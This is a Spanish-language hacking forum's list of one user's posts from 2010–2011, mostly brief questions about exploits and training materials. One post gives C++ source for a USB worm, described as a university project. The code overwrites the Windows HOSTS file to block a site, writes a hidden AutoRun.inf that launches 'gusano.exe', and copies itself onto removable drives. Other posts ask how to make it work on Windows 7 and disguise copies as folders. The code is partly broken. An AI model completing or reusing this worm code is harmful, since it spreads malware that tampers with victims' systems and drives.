elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / duda desbordar .net en: 5 Agosto 2011, 01:48 am
hoola a todos tengo una duda en que casos se puede dar un desborde en una aplicacion hecha en c# por ejmplo en que situcion se daria

gracias
un saludo
2  Seguridad Informática / Análisis y Diseño de Malware / Re: ayuda proyecto worm en: 2 Agosto 2011, 01:28 am
hola [L]ord [R]NA jejej si estoy inten tando un metodo similar suplantar todas las carpetas del usb con una copia del worm con el nombre de la carpeta pero no puedo encontrar info de como obtener el nombre q tomo mi exe o el proceso que abrio alguna idea???


saludos
3  Seguridad Informática / Análisis y Diseño de Malware / Re: ayuda proyecto worm en: 22 Julio 2011, 03:12 am
gracias por tu aporte pero por que no funcionara en windows 7 que necesito o como puedo hacerle atoapto para windows 7

gracias un saludo
4  Seguridad Informática / Análisis y Diseño de Malware / Re: ayuda proyecto worm en: 20 Julio 2011, 10:01 am
hola a todos estoy de vuelta mi pregunta es que estoy haciendo mal por que no me esta infectando el usb este es mi codigo espero me puedan giar
Código:
#include <cstdlib>
#include <iostream>
#include <windows.h>
#include<fstream>
#define PROCESSNAME "gusano.exe" //nombre del proceso

using namespace std;
 
    char me[1024];
    HKEY hKey;
    char *drives[] = {"C:","D:","E:","F:","G:","H:","I:","J:","K:","L:",
                      "M:","N:","O:","P:","Q:","R:","S:","T:","U:","V:",
                      "W:","X:","Y:","Z:"};
                      void hst(void)
{
char hst[MAX_PATH];
    DWORD byte;
HANDLE hFile;
BOOL bSuccess;
GetSystemDirectory(hst, sizeof(hst));

strcat(hst, "\\Drivers\\ETC\\HOSTS");
const char* buffer = "127.0.0.1 www.entel.bo";
hFile = CreateFile(hst, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL);
CloseHandle(hFile);     
}

    //busqueda e infeccion del usb
    int FindDrv()
{
         char *drives;
char dirX[MAX_PATH];
char path[MAX_PATH];
char autorun[MAX_PATH]="AutoRun.inf";
ofstream CreAut;
HMODULE GetQ;

   GetQ=GetModuleHandle(NULL);
    GetModuleFileName(GetQ,path,sizeof(path));
      CreAut.open(dirX,ios_base::out);
             CreAut<<"[AutoRun]"<<endl;
             CreAut<<"open=gusano.exe"<<endl;
             CreAut<<"shellexecute=gusano.exe"<<endl;
             CreAut<<"shell\\Auto\\command=gusano.exe"<<endl;
             CreAut<<"shell=Auto"<<endl;
      CreAut.close();
      SetFileAttributes(dirX,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
             UINT type= GetDriveType(drives);
                  if(type == DRIVE_REMOVABLE)
                     {
                       strcpy(dirX, drives);
                       strcat(dirX, "\\");
                       strcat(dirX, "gusano.exe");
                       CopyFile(path,dirX,TRUE);
                     
                       return 0;
                     }
  return 0;
}

int main(int argc, char *argv[])
{
    hst();
    FindDrv();

system("PAUSE");
  // ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

    return EXIT_SUCCESS;
}
5  Seguridad Informática / Análisis y Diseño de Malware / ayuda proyecto worm en: 12 Julio 2011, 09:30 am
hola a todos este es mi primer post me gustaria q me ayuden con un proyecto que estoy ahciendo pra la universidad el cual tengo que crear un worm en c que modifique el archivo de host espero me puedan ayudar solo que modifique el archivo host
6  Seguridad Informática / Hacking / Re: Certified Ethical Hacker v6 Training Completo + All Labs 4 DVD Mas Nuevo!! en: 4 Febrero 2010, 00:00 am
hola podrias revisar los links de file factory del lab 3 estan mal gracias y el dvd 4 no lo puedes subir tb a file factory gracias
7  Seguridad Informática / Hacking / Re: Certified Ethical Hacker v6 Training Completo en: 21 Enero 2010, 14:41 pm
hola jpmo4  muy pero muy buen aporte pero tengo problemas con el dvd3 no puedo abrir ninguno de los pdf´s y ninguno de los exe que podra ser todos los demas esta ok gracias
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines